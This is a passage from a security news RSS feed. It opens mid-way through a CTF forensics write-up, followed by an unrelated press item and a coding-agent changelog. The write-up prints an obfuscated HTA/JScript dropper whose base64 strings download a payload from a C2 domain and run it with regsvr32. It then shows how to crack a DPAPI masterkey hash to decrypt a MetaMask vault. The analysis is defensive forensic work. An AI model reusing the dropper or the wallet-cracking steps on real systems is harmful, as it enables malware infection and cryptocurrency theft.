A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";for(i=0;i&lt;64;i++){e[A.charAt(i)]=i;}for(x=0;x&lt;L;x++){c=e[aQPiI.charAt(x)];b=(b&lt;&lt;6)+c;l+=6;while(l&gt;=8){((a=(b&gt;&gt;&gt;(l-=8))&amp;0xff)||(x&lt;(L-2)))&amp;&amp;(a8qHR+=w(a));}}return(a8qHR);};a0chb2 = false;aPCUL7 = window;a1oWCZ = -33192;aBd7i = document;var aXhVs = "apKsW";aPCUL7.resizeTo(1, 1);aupXs7 = false;aXRTl2 = true;aPCUL7.moveTo(-100, -100);aJM8V1 = -49805;var amlU3 = -36589;var aTnbMl = 41478;var aTqS3V = "act038";var aKI6ix = aTqS3V.toLowerCase();aae3kO = 32908;aITus4 = "aoXe2L";var aDUOYP = aITus4.toString();var a3KlRp = aUrMf("CQkJCQkJdmFyIGFzeWRPcSA9IG5ldyBBY3RpdmVYT2JqZWN0KCJtc3htbDIueG1saHR0cCIpOw0KCQkJCQkJYXN5ZE9xLm9wZW4oIkdFVCIsICJodHRwOi8vNXRoYXQ2LmNvbS9hc3NldHMvNTVkZGI3NzUvY2U1MTAyNWIxMi85Yjc1YmJjZS84YTA2ZmQ0Ny82YWM4NGU3NDI0YjA1MzkyODY1NjJiL3h0dWFxMTQ/YW56PTEyNWM1OTA5JmRsendnPTdhZWMxNjdhNWEyYWIwJmJ1PWEwOWY3NDAiLCBmYWxzZSk7DQoJCQkJCQlhc3lkT3Euc2VuZCgpOw0KDQoJCQkJCQlpZihhc3lkT3Euc3RhdHVzID09IDIwMCkNCgkJCQkJCXsNCgkJCQkJCQl2YXIgYWJVc1ggPSBuZXcgQWN0aXZlWE9iamVjdCgiYWRvZGIuc3RyZWFtIik7DQoJCQkJCQkJYWJVc1gub3BlbjsNCgkJCQkJCQlhYlVzWC50eXBlID0gMTsNCgkJCQkJCQlhYlVzWC53cml0ZShhc3lkT3EucmVzcG9uc2Vib2R5KTsNCgkJCQkJCQlhYlVzWC5zYXZldG9maWxlKCJjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIsIDIpOw0KCQkJCQkJCWFiVXNYLmNsb3NlOw0KCQkJCQkJfQ==");var aE1HIO = aUrMf("CQkJCQkJCW5ldyBBY3RpdmVYT2JqZWN0KCJ3c2NyaXB0LnNoZWxsIikucnVuKCJyZWdzdnIzMiBjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIpOw0KCQkJCQkJCXZhciBhRVFicFUgPSBuZXcgQWN0aXZlWE9iamVjdCgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKTsNCgkJCQkJCQlhRVFicFUuZGVsZXRlZmlsZSgiYzpcXHByb2dyYW1kYXRhXFxhWmU0SS5odGEiKTs=");&lt;/script&gt;&lt;script language="javascript"&gt;var a4EQx = -19950;function aQ3AaU(a71O9o){var an6WK = "aRLg9";var a5X0Gz = an6WK.toLowerCase();var a8B3lh = "aSwVuU";aUaQNt = a8B3lh.toLowerCase();var akSl73 = aUgasq("msscriptcontrol.scriptcontrol");arCgh1 = "aHX0J";akSl73.Language = "jscript";var aM86j = true;aVTiFm = -35420;akSl73.Timeout = 60000;amH0b = true;axXiRp = true;akSl73.AddCode(a71O9o);axGBr = 38917;var a30g4 = true;return(null);}&lt;/script&gt;&lt;script language="vbscript"&gt;aQ3AaU a3KlRp : aQ3AaU aE1HIO : aPCUL7.close&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;/w:t&gt;</pre><p>after investigation, we can see 2 big encoded base64 text:</p><pre>CQkJCQkJdmFyIGFzeWRPcSA9IG5ldyBBY3RpdmVYT2JqZWN0KCJtc3htbDIueG1saHR0cCIpOw0KCQkJCQkJYXN5ZE9xLm9wZW4oIkdFVCIsICJodHRwOi8vNXRoYXQ2LmNvbS9hc3NldHMvNTVkZGI3NzUvY2U1MTAyNWIxMi85Yjc1YmJjZS84YTA2ZmQ0Ny82YWM4NGU3NDI0YjA1MzkyODY1NjJiL3h0dWFxMTQ/YW56PTEyNWM1OTA5JmRsendnPTdhZWMxNjdhNWEyYWIwJmJ1PWEwOWY3NDAiLCBmYWxzZSk7DQoJCQkJCQlhc3lkT3Euc2VuZCgpOw0KDQoJCQkJCQlpZihhc3lkT3Euc3RhdHVzID09IDIwMCkNCgkJCQkJCXsNCgkJCQkJCQl2YXIgYWJVc1ggPSBuZXcgQWN0aXZlWE9iamVjdCgiYWRvZGIuc3RyZWFtIik7DQoJCQkJCQkJYWJVc1gub3BlbjsNCgkJCQkJCQlhYlVzWC50eXBlID0gMTsNCgkJCQkJCQlhYlVzWC53cml0ZShhc3lkT3EucmVzcG9uc2Vib2R5KTsNCgkJCQkJCQlhYlVzWC5zYXZldG9maWxlKCJjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIsIDIpOw0KCQkJCQkJCWFiVXNYLmNsb3NlOw0KCQkJCQkJfQ==<br><br>CQkJCQkJCW5ldyBBY3RpdmVYT2JqZWN0KCJ3c2NyaXB0LnNoZWxsIikucnVuKCJyZWdzdnIzMiBjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIpOw0KCQkJCQkJCXZhciBhRVFicFUgPSBuZXcgQWN0aXZlWE9iamVjdCgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKTsNCgkJCQkJCQlhRVFicFUuZGVsZXRlZmlsZSgiYzpcXHByb2dyYW1kYXRhXFxhWmU0SS5odGEiKTs=</pre><p>Now let’s take a look on <a href="https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)&amp;input=Q1FrSkNRa0pkbUZ5SUdGemVXUlBjU0E5SUc1bGR5QkJZM1JwZG1WWVQySnFaV04wS0NKdGMzaHRiREl1ZUcxc2FIUjBjQ0lwT3cwS0NRa0pDUWtKWVhONVpFOXhMbTl3Wlc0b0lrZEZWQ0lzSUNKb2RIUndPaTh2TlhSb1lYUTJMbU52YlM5aGMzTmxkSE12TlRWa1pHSTNOelV2WTJVMU1UQXlOV0l4TWk4NVlqYzFZbUpqWlM4NFlUQTJabVEwTnk4MllXTTROR1UzTkRJMFlqQTFNemt5T0RZMU5qSmlMM2gwZFdGeE1UUS9ZVzU2UFRFeU5XTTFPVEE1Sm1Sc2VuZG5QVGRoWldNeE5qZGhOV0V5WVdJd0ptSjFQV0V3T1dZM05EQWlMQ0JtWVd4elpTazdEUW9KQ1FrSkNRbGhjM2xrVDNFdWMyVnVaQ2dwT3cwS0RRb0pDUWtKQ1FscFppaGhjM2xrVDNFdWMzUmhkSFZ6SUQwOUlESXdNQ2tOQ2drSkNRa0pDWHNOQ2drSkNRa0pDUWwyWVhJZ1lXSlZjMWdnUFNCdVpYY2dRV04wYVhabFdFOWlhbVZqZENnaVlXUnZaR0l1YzNSeVpXRnRJaWs3RFFvSkNRa0pDUWtKWVdKVmMxZ3ViM0JsYmpzTkNna0pDUWtKQ1FsaFlsVnpXQzUwZVhCbElEMGdNVHNOQ2drSkNRa0pDUWxoWWxWeldDNTNjbWwwWlNoaGMzbGtUM0V1Y21WemNHOXVjMlZpYjJSNUtUc05DZ2tKQ1FrSkNRbGhZbFZ6V0M1ellYWmxkRzltYVd4bEtDSmpPbHhjY0hKdlozSmhiV1JoZEdGY1hHRmFaVFJKTG5SdGNDSXNJRElwT3cwS0NRa0pDUWtKQ1dGaVZYTllMbU5zYjNObE93MEtDUWtKQ1FrSmZRPT0KCkNRa0pDUWtKQ1c1bGR5QkJZM1JwZG1WWVQySnFaV04wS0NKM2MyTnlhWEIwTG5Ob1pXeHNJaWt1Y25WdUtDSnlaV2R6ZG5Jek1pQmpPbHhjY0hKdlozSmhiV1JoZEdGY1hHRmFaVFJKTG5SdGNDSXBPdzBLQ1FrSkNRa0pDWFpoY2lCaFJWRmljRlVnUFNCdVpYY2dRV04wYVhabFdFOWlhbVZqZENnaWMyTnlhWEIwYVc1bkxtWnBiR1Z6ZVhOMFpXMXZZbXBsWTNRaUtUc05DZ2tKQ1FrSkNRbGhSVkZpY0ZVdVpHVnNaWFJsWm1sc1pTZ2lZenBjWEhCeWIyZHlZVzFrWVhSaFhGeGhXbVUwU1M1b2RHRWlLVHM9&amp;oeol=CRLF"><strong>cyberchef</strong></a>, we can answer all other question immediately:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/958/1*gZoXyg80SCM_xA7n_-DpPg.png"></figure><p>c2 domain: <strong><em>5that6[.]com</em></strong></p><p>payload file name: <strong><em>aZe4I.tmp</em></strong></p><p>system utility used for execution: <strong><em>regsvr32</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/478/1*rGlVaKw8W5_EM8f6WZZGPQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/736/1*IOmGkK33GjI51eb_0T8pRA.png"></figure><p>we have a disk image “<strong><em>image.ad1</em></strong>” file, that starts its partition from “<strong><em>C:\Users\tarok\AppData</em></strong>”. so we don’t have so much to see here.</p><p>I systematically examined all files within the disk image, found the “<strong><em>UsrClass.dat</em></strong>” file, which resides in “<strong><em>C:\Users\tarok\AppData\Local\Microsoft\Windows\UsrClass.dat</em></strong>”.</p><p>it contains settings for apps and Windows shell (e.g., recent files, UI customizations) and so on for each user.</p><p>opening the BagMru key path, which resides in “<strong><em>UsrClass.dat:<br>Local Settings\Software\Microsoft\Windows\Shell\BagMRU\</em></strong>”</p><p>found something very interesting that attracted my eyes directly</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/338/1*O4QtDq5QQ8leIcXtQa5N1g.png"><figcaption>very weird data</figcaption></figure><p>found this in reg path “<strong>UsrClass.dat: Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1</strong>”</p><p>we need a deep investigation so let’s dig deeper with ShellBags Explorer by the GOAT Eric Zimmerman<br>Load offline Hive but remember — You must dump it’s log file<strong><em> </em></strong>“<strong><em>UsrClass.dat.LOG1</em></strong>” to parse correctly</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/346/1*S68bZEm1hxfvIkvMcEratA.png"><figcaption><strong>It couldn’t be clearer than that</strong></figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/492/1*jQmpbCVoTKLzgzeTy2Zzyg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/619/1*rQBnoWLpSX_Lq8MSXcAlKA.png"></figure><p>After an extensive investigation on the provided disk image we have here,</p><p>Initially, I examined all web browser data. While the Edge history database yielded no results, I identified an interesting visited websites in Firefox’s history database C:\Users\Wh1pl4sh\AppData\Roaming\Mozilla\Firefox\fvdbjn8o.default-release\places.sqlite</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/971/1*vsUm7kpWxP4_9EBWBH5yiA.png"></figure><p>found that he searched for “<strong><em>metamask</em></strong>”, which is a cryptocurrency wallet and browser extension that lets users manage Ethereum-based assets and interact with decentralized applications (dApps)</p><p>He also searched for a very important medium link of how to get the seed phrase.</p><p><a href="https://medium.com/@estebankiteboarding/how-i-helped-to-recover-300k-usd-in-eth-and-nfts-from-metamask-de307ba5f942">How I helped to recover 300K USD in ETH and NFT’s from metamask…</a></p><p>we got a very important insight of what we are looking for exactly, and a very valuable website can be used to decrypt the data we are seeking of</p><p><a href="https://metamask.github.io/vault-decryptor/">MetaMask Vault Decryptor</a></p><p>With more deep investigation, i discovered the “<strong>metamask</strong>”<strong> </strong>extension in the default Firefox profile located at: C:\Users\Wh1pl4sh\AppData\Roaming\Mozilla\Firefox\fvdbjn8o.default-release\storage\default\&lt;HERE&gt;</p><p>It’s time to research, i’ve searched about how to recover my secret recovery phrase correctly, and found this precocious link, which is from metamask support themselves.</p><p><a href="https://support.metamask.io/configure/wallet/how-to-recover-your-secret-recovery-phrase/">How to recover your Secret Recovery Phrase | MetaMask Help Center</a></p><p>reading the firefox section carefully, we can see how to retrieve the data correctly step by step, but i have a better idea.</p><p>with more and more investigation, we can only get the correct database that contains the encrypted data, instead of what the support say exactly.</p><p>after a lot of digging, i found the database that contains the encrypted data:</p><p>C:\Users\Wh1pl4sh\AppData\Roaming\Mozilla\Firefox\fvdbjn8o.default-release\storage\default\moz-extension+++9d43d20e-c6b8-4b71-b6ad-5a503dedc147\idb\3117620802mpeutkacmaabs-k.sqlite</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iG8wFRK5tF5uJdhzvigCiQ.png"></figure><p>The keys are Caesar Ciphered as follows:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/863/1*M4ioRKTeQQir2PjLttRgbg.png"></figure><p>our encrypted vault are in “<strong><em>0KeyringController</em></strong>”, let’s take a look:</p><pre>{"data":"FF+4Fwzlmqu5/v85xYso8fgUQR6uRybNx6t5yhwIRmb4omPFYNP2q6qsKsu7vXAWi8PMWQzZYjCH8dOazNMV/W8RWau78EkZDJoILIW9vhKONrjd1EsTG3Ywi+hFxOlZAAsPLlGY13QfEDAfaKjBrligdhtzziOTPo7Quu16nwwjGigJxSJrD7DRNP4+Jw1dgatFD2iWSjy5DgzMWHbiAFvo436OYYUOirz95u/nF7HsI9Zz39RKC12uasViHytKBs/oAzEhqy8PCqdVwNQD4fbgoGSJqO9Up1etA5nj+ETYhIg900kh3L58LoeTbDTU8wK/wD3PPVrxMmMOKUmP6TwDhPG2FY92YTgqLXP7t/w3Is85sEUh0fsPdSTnFV3HVYDLMBOqJCRVe1iyzIvEj/l/T7yMzXHZdIrNtR+3hIo6k3Ep3izwzZaExkHbsIoJQiCjQoDcmo8nRltE54FU1ijdQCtd94yk7gx2/5g5ycAekBOj9tMyNXpL9zPdkvHgvbi1wOP1BsE/+Rftj5OJtQVpQ14Mb91FznyB37OUMU/D996ltEfd2A6hfEF+D0Vros/UDYkaxL0urTmy6GEJUPKkyftDLFRfmypyxzlrPFGhwMUpEycVXNiVu7YN1Il3CD5cFM88jDNmvyIGWru9YRsF1jIuvhEeF2YWQ7YSc0vnQZExCWhHQFPS33CGq/8CoADwSEzqaWxgYM04CsAeA68aqZTNZgBFYexaLsnu09V+aNYCXHLjAmB52lMVOy0v42d1S21zQ4rr862Rt+a3mTGVmtGvITd3w2vPREoxZcEbeW89R//vSmjLwW0+KQVD6mlLKzo5o9pS7+NJhgivF/KZUDnyMSLdMDf9IzrazOvIRUXWgQOLr86YpJ/GE2w/Hq1UZRldvEEg6YOs6tmOEQjR/4+xeQaLRpWO9bs8/KmQFljSOQOgkQfXqileC0q+vz+619fFHBYZMoEKVOKfDZFf/A5oeXfx5oE2tLb9t4MGkS9YGQC0lPNA+DVELYPPKqlK24/GQ7ceWimbCDDEdbLHxNe/CRr1GEf2s1SBdRaoeYS7EQnay1Uo/vEym+ConX5jlFHBixtmqwXq3cZP41eV6RIykYcx+sW9CACJDZvn6xs8kXSHbmHWy4vJqcOUbSsVnYPTyqFep1mCxtqU0fXXJAVFB1sVfVsf3oF/eZxrgS+CEDE91NMoyhdNVLPohd/fs6BUk9kr+1rqE5HsU+UqTaFaLLjgwOIHvVnqk9Boto7zonIAVTq6BPM/nZengxIYRoFee7e5ddVzCmcSR+SexxVU7/ctRuHMBPKtGmU49pvqU1JL8YBCRaZOwoFyKbMYc3hEOfjfkKLExLrU/Gcmq5or180YiMoPa5Cq+nPoj1ByXq1KP4JBjZ89Tlj7d+Q0eUaMO3IqhmDx+181FVwb9wUQtKkzWdL3Ie8We1sX9/VS0AdL3lyw7Sb2G73MMEOUzhrMuJ7rrToRAw==","iv":"NJ5Mq2Azg7GzwgKc8ZgXDA==","keyMetadata":{"algorithm":"PBKDF2","params":{"iterations":600000}},"salt":"AZBa8AhppeaO1hoa1PyhIgUViSH3CF8urWwW2OxkHtg="}</pre><p>now let’s hop on <a href="https://metamask.github.io/vault-decryptor/"><strong>MetaMask Vault Decryptor</strong></a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*gWBsMzJSVKWCqvajbMYcUw.png"></figure><p>now we need to get the correct password. Since SAM registry file was deleted, we don’t have any other option to get the password, except “<strong>DPAPI</strong>”<br>Windows API that encrypts user secrets using the user’s login password; stored in AppData\Roaming\Microsoft\Protect\&lt;SID&gt; as AES-encrypted masterkeys.</p><p>So, we need the<strong> </strong>user’s DPAPI masterkey file : AppData\Roaming\Microsoft\Protect\S-1-5-21-2430665207-3300790704-3908932582-1001\a3ef4996-d3ea-422c-9de1-62931c21fb47and the user SID: <br>S-1-5-21-2430665207-3300790704-3908932582-1001to extract a hash for password cracking. since we have both, let’s get to kali machine quickly.</p><p>we have <a href="https://www.kali.org/tools/john/#dpapimk2john"><strong><em>DPAPImk2john</em></strong></a> tool that can significantly simplify our work.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*m3Yd6v42LvW4f8YG-W_DRw.png"><figcaption><strong>step 1</strong></figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rK4162iU7Qp9_odkqq7kKA.png"><figcaption><strong>step 2 (not necessary)</strong></figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wywD0fl9sHgarOzlHaWGzA.png"><figcaption><strong>step 3</strong></figcaption></figure><p>Now we got everything, let’s head back to <a href="https://metamask.github.io/vault-decryptor/"><strong>MetaMask Vault Decryptor</strong></a><strong> </strong>with password “<strong><em>iloveyou2</em></strong>”, and decrypt the vault to get the Secret Backup Phrase</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OftWzrRxMb_rCWTH8ee4BA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/493/1*kWiYFGI2ZiFNI9rE_x9lww.png"></figure><h4>Thanks For Reading, Hope u enjoyed ❤</h4><p>Keep in touch with me via:</p><p><a href="https://www.linkedin.com/in/loay-salah"><strong>LinkedIn</strong></a></p><p><strong>Discord</strong>: prankster99</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=6d66c31cce9a" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/connectors-ctf-2025-dfir-challenges-6d66c31cce9a">Connectors CTF 2025 — DFIR Challenges</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Knot Worldwide Announces Integration with Venmo to Deliver Seamless Gifting Experiences for Couples and Guests]]></title>
<description><![CDATA[Integration with Venmo and The Knot’s Wedding Registry gives guests a familiar and trusted way to contribute to registry cash funds, while keeping registry tracking all in one place]]></description>
<link>https://tsecurity.de/de/3599205/it-security-nachrichten/the-knot-worldwide-announces-integration-with-venmo-to-deliver-seamless-gifting-experiences-for-couples-and-guests/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599205/it-security-nachrichten/the-knot-worldwide-announces-integration-with-venmo-to-deliver-seamless-gifting-experiences-for-couples-and-guests/</guid>
<pubDate>Mon, 15 Jun 2026 15:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Integration with Venmo and The Knot’s Wedding Registry gives guests a familiar and trusted way to contribute to registry cash funds, while keeping registry tracking all in one place]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.13.3]]></title>
<description><![CDATA[@oh-my-pi/pi-agent-core
Added

Added the interruptible tool field: when set, the agent loop may abort the tool mid-execution to deliver a queued steering message (honored only in immediate interrupt mode).
Added support for gemini and gemma as valid owned tool syntax values in environment configu...]]></description>
<link>https://tsecurity.de/de/3598860/tools/v15133/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598860/tools/v15133/</guid>
<pubDate>Mon, 15 Jun 2026 13:09:42 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-agent-core</h2>
<h3>Added</h3>
<ul>
<li>Added the <code>interruptible</code> tool field: when set, the agent loop may abort the tool mid-execution to deliver a queued steering message (honored only in <code>immediate</code> interrupt mode).</li>
<li>Added support for <code>gemini</code> and <code>gemma</code> as valid owned tool syntax values in environment configuration</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>pruneToolOutputs</code> blanking tiny tool results during overflow pruning: results below <code>50</code> tokens (<code>MIN_PRUNE_TOKENS</code>) are no longer replaced with the <code>[Output truncated - N tokens]</code> placeholder, which cost more tokens than the result itself and churned the prompt cache for zero savings.</li>
</ul>
<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Added the <code>gemini</code> in-band tool-call syntax with Python-style <code>tool_code</code> blocks and <code>default_api</code> invocations</li>
<li>Added the <code>gemma</code> token-delimited in-band tool-call syntax using <code>&lt;|tool_call&gt;</code> and <code>&lt;|tool_response&gt;</code> blocks</li>
<li>Added <code>gemini</code> and <code>gemma</code> to owned stream tool-result token detection so their tool responses are recognized</li>
<li>Fixed truncated Gemini and Gemma tool blocks from being emitted as plain text during streaming</li>
<li>Added the Azure OpenAI provider definition (<code>azure</code>) to the registry; <code>AZURE_OPENAI_API_KEY</code> resolves as its env-var API key via the catalog provider table.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Gemini tool-call examples now render without the <code>default_api.</code> namespace prefix, keeping <code>&lt;example&gt;</code> blocks concise. The live wire format still uses <code>default_api.</code> per the Gemini grammar.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed duplicate tool call projections by deduplicating provider-native <code>toolCall</code> events against in-band <code>tool_code</code> calls and keeping only the first real channel</li>
<li>Dropped nameless native <code>toolCall</code> events so they no longer appear as surfaced tool calls in owned-mode streams</li>
<li>Fixed Gemini/Gemma in-band tool-call parsing around Python comments, raw/unicode string literals, and Gemma close-token text inside string values.</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Added</h3>
<ul>
<li>Added Azure OpenAI as a catalog provider (<code>azure</code>, default model <code>gpt-5.5</code>, env var <code>AZURE_OPENAI_API_KEY</code>), bundling the OpenAI-family models Azure serves over the Responses API (GPT-4/4.1/4o, GPT-5 family, o-series, Codex). Like Amazon Bedrock it is catalog-only — models ship in the bundle and become selectable once the env key is set, with the deployment base URL resolved at runtime from <code>AZURE_OPENAI_BASE_URL</code>/<code>AZURE_OPENAI_RESOURCE_NAME</code>.</li>
<li>Added models.dev-backed bundled catalogs for providers that previously shipped no offline models: Hugging Face, Kilo, Moonshot, NanoGPT, Synthetic, Venice, Ollama Cloud, and the Xiaomi Token Plan regions (ams/cn/sgp). They still discover live when credentialed; the bundle is now a non-empty baseline.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Updated stale provider default models to their latest bundled versions: OpenAI-family providers (<code>azure</code>, <code>github-copilot</code>, <code>aimlapi</code>) → GPT-5.5; Gemini providers (<code>google</code>, <code>google-gemini-cli</code>, <code>google-vertex</code>) → <code>gemini-3.1-pro-preview</code>; GLM providers (<code>zai</code>, <code>zhipu-coding-plan</code>) → <code>glm-5.2</code>, <code>cerebras</code> → <code>zai-glm-4.7</code>; Kimi providers (<code>fireworks</code>, <code>opencode-go</code>, <code>moonshot</code>) → <code>kimi-k2.7-code</code>, <code>kimi-code</code> → <code>kimi-for-coding</code>, <code>together</code> → <code>moonshotai/Kimi-K2.7-Code</code>; <code>alibaba-coding-plan</code> → <code>qwen3.7-plus</code>; and Claude-Sonnet defaults (<code>cloudflare-ai-gateway</code>, <code>cursor</code>, <code>gitlab-duo</code>, <code>kilo</code>, <code>opencode-zen</code>, <code>vercel-ai-gateway</code>) → Claude Opus 4.x.</li>
<li>Restricted models.dev Azure discovery to OpenAI-family IDs (<code>gpt-</code>, <code>o1</code>, <code>o3</code>, <code>o4</code>, <code>codex</code>, <code>chatgpt</code>), excluding Foundry-hosted third parties (Claude/DeepSeek/Llama/Mistral/Phi) that Azure serves through non-Responses APIs.</li>
<li>Detected the Azure OpenAI Responses compat surface (developer role, strict tool mode, strict tool-result pairing) by provider id as well as base URL, so bundled <code>azure</code> models whose deployment host is only known at runtime still get the right wire behavior.</li>
<li>Renamed the <code>Qwen3-ASR-Flash</code> model label to <code>Qwen3 ASR Flash</code></li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed tool syntax selection for Gemini-family and Gemma model IDs by routing them to dedicated <code>gemini</code> and <code>gemma</code> formats instead of generic XML</li>
<li>Fixed <code>zhipu-coding-plan</code> and <code>together</code> shipping no bundled models: their descriptors referenced non-existent models.dev keys (<code>zhipu-coding-plan</code>, <code>together</code>); pointed them at the real keys (<code>zhipuai-coding-plan</code>, <code>togetherai</code>) so they bundle their GLM and full catalogs respectively.</li>
<li>Folded the <code>azure-openai-responses</code> API into the OpenAI Responses thinking-inference branches so Azure reasoning models (o-series, GPT-5, Codex) resolve the discrete effort vocabulary (including <code>xhigh</code>) and effort-control mode instead of falling through to generic defaults.</li>
<li>Fixed <code>ollama-cloud</code> discovery inheriting an unsafe cross-provider <code>contextWindow</code>/<code>maxTokens</code> when <code>/api/show</code> returns no size metadata; it now falls back to the safe 128K context / 8K output caps.</li>
<li>Dropped internal Fireworks control-plane resource ids (<code>accounts/fireworks/{models,routers}/…</code>) from the bundle; only the public request ids ship.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Unexpected stop detection: optional tiny/smol classifier that continues the turn when the assistant says it will act but emits no tool calls.</li>
<li>Settings <code>features.unexpectedStopDetection</code> and <code>providers.unexpectedStopModel</code>.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed the <code>job</code> poll to return early when a steering message is queued, draining the steer immediately instead of waiting out the poll window.</li>
<li>Capped unexpected-stop auto-continuation to three retry attempts before giving up on repeated stops</li>
<li>Updated the <code>edit</code> tool's hashline prompt, grammar, and docs to recommend the <code>.=</code> inclusive range separator (<code>SWAP 1.=3:</code>); the legacy <code>..</code> form still parses.</li>
<li>Normalized all internal worker argv selectors under the <code>__omp_worker_</code> prefix, skipping the async worker dispatch check during normal CLI startup.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Filtered out whitespace-only and dot-only (<code>.</code> or <code>…</code>) assistant blocks so they are treated as empty and no longer appear as visible content in message rendering, streaming reveal counts, or session export output</li>
<li>Filtered placeholder-only thinking content from ACP notifications and message visibility checks so dot-only <code>reasoning_content</code> no longer triggers turn completion or read/run updates</li>
<li>Fixed ModelRegistry tests making outbound network calls by automatically stubbing fetch during test execution.</li>
<li>Fixed <code>eval</code> JS cells (and browser-tab worker startup) always stalling for the full init timeout — typically the cell's whole 30s budget — before silently falling back to the slower inline worker. The self-dispatching CLI host imports the worker module dynamically from its argv dispatch, so the worker's own <code>parentPort.on("message")</code> attached only after Bun flushed the messages the parent posted before spawn; the synchronously-posted <code>init</code> handshake was dropped and never answered with <code>ready</code>. The host now installs a buffering <code>parentPort</code> inbox synchronously in the entry's sync prefix (before importing the worker module) and the worker binds it on load, replaying the buffered handshake. <code>omp --smoke-test</code> now also spawns the JS eval worker through the host entry and asserts it handshakes on a real worker thread.</li>
<li>Fixed pre-prompt context-full compaction on OpenAI Responses sessions to use provider-anchored context usage when available, so large encrypted reasoning signatures no longer trigger automatic maintenance while the visible context percentage remains below threshold (<a href="https://github.com/can1357/oh-my-pi/issues/2628" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2628/hovercard">#2628</a>).</li>
</ul>
<h2>@oh-my-pi/collab-web</h2>
<h3>Fixed</h3>
<ul>
<li>Wrapped composer button labels to display icon-only on mobile devices for a more compact and readable layout</li>
<li>Made the connect screen, ended session card, and notification toasts fully responsive for smaller device viewports</li>
<li>Fixed mobile layout issues where the entire chat flow would overflow horizontally and text was rendered too large on iOS Safari (by setting <code>text-size-adjust: 100%</code>)</li>
<li>Made transcript rows stack vertically on small screens to optimize reading space, and prevented grid track expansion</li>
<li>Hid non-essential metadata (such as the model name, thinking level, and working directory path) and context gauge tracks on mobile headers to prevent overflow</li>
</ul>
<h2>@oh-my-pi/hashline</h2>
<h3>Changed</h3>
<ul>
<li>Changed the recommended hashline range separator from <code>..</code> to <code>.=</code> (e.g. <code>SWAP 1.=3:</code>, <code>DEL 4.=5</code>) so the inclusive <code>&lt;=</code>-style end is self-evident. <code>HL_RANGE_SEP</code> is now <code>.=</code>; the prompt, grammar, error messages, and emitted headers all use it. The lenient parser still accepts the legacy <code>..</code> (and <code>-</code>/<code>…</code>/space) forms.</li>
</ul>
<h2>@oh-my-pi/omp-stats</h2>
<h3>Changed</h3>
<ul>
<li>Renamed <code>__omp_stats_sync_worker</code> to <code>__omp_worker_stats_sync</code>.</li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Added</h3>
<ul>
<li>Added <code>installWorkerInbox(port)</code> / <code>consumeWorkerInbox()</code> to <code>@oh-my-pi/pi-utils/worker-host</code>. A self-dispatching CLI host that imports a Bun worker module dynamically attaches the worker's real <code>message</code> listener after Bun flushes the messages the parent posted before spawn, dropping a synchronously-posted <code>init</code>. The host installs this buffering inbox synchronously in the entry's sync prefix so a listener exists at flush time; the worker module consumes it and binds the real handler, replaying anything buffered.</li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.13.2...v15.13.3"><tt>v15.13.2...v15.13.3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sovereign cloud won’t fix your AI risk. Identity governance will]]></title>
<description><![CDATA[Your board is asking. Your legal team is asking. Your auditors will be asking: Should AI workloads move to sovereign cloud, or stay on AWS, Azure or GCP? European enterprises have already run this experiment — under real regulatory pressure, with real money and real consequences. Many discovered ...]]></description>
